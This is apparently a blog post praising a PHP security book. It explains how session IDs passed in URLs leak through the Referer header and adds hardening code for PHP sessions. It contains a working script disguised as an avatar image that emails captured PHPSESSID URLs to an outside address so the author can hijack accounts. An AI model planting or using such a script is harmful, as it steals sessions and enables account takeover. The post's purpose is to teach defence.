Just started reading Ilia Alshanetsky's new PHP Guide to Security book found over at http://www.phparch.com and I must say this is a must-have book for any serious PHP developer. The session security chapter alone is worth the price. Here is a little script I wrote which should point out why you should NEVER keep any personal information on a site that transmits its session IDs through the URL.
Let's say we're on a web forum together on www.xyz.com and I'm allowed to post a URL to an image in my avatar. Instead of www.jimsite.com/myimage.jpg I make it www.jimsite.com/fake_image.php, so the HTML would output:

<img src="www.jimsite.com/fake_image.php">

If your URL has the session ID passed in it, like www.xyz.com?PHPSESSID=593584jgjdl59, and you view the page that has my image, guess what I can write:
<?php
// The forum page that embeds this "image" sends its own URL in the Referer
// header; on a site with URL-based sessions that URL carries PHPSESSID.
$referrer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

// Let's check to see if we got something juicy
if (strstr($referrer, 'PHPSESSID=')) {
    mail('jplush76@gmail.com', 'GOT A SESSION ID!', $referrer);
}

// Serve a real image so nothing looks wrong on the forum page
// ($type was never defined in the original snippet)
$type = 'image/jpeg';
header("Content-type: $type");
readfile('myimage.jpg');
?>
So it looks like it still outputs my image, but I have just emailed myself your URL string whenever it contains PHPSESSID, which is the default session ID name PHP uses. Once I get that email I can copy/paste it into my browser and, guess what, I'm now you. I can get into your account and do whatever I want, and it was pretty darn easy.
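The defender's side, as an added example that is not code from the post or the book: the PHP session settings that keep the ID out of the URL in the first place, so a Referer header has nothing to carry (the function name harden_session is my own, and the cookie_secure line assumes the site runs over HTTPS).

```php
<?php
// Added example, not from the post or the book: stop the session ID from ever
// reaching a URL, and refuse to trust one that arrives that way.
function harden_session()
{
    // The core fix: only accept the ID from the cookie, never from PHPSESSID in
    // the query string, and never rewrite links/forms to append it.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');

    // The cookie itself: unreadable by scripts, and HTTPS-only (assumes HTTPS).
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_secure', '1');

    // Ask browsers not to send this page's URL to third-party resources such
    // as a hot-linked avatar image.
    header('Referrer-Policy: no-referrer');

    session_start();

    // Defence in depth: if PHPSESSID still shows up in the query string (an old
    // link, a misconfigured proxy), it may already be exposed. Log it and hand
    // the user a fresh ID instead of honouring the one in the URL.
    if (isset($_GET[session_name()])) {
        error_log('session id supplied via URL from ' . $_SERVER['REMOTE_ADDR']);
        session_regenerate_id(true);   // true = discard the old session data
    }
}

harden_session();
```

Put this before any output on every page that calls session_start(), or set the same ini values in php.ini so no script can forget them.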
Be warned... and get that book!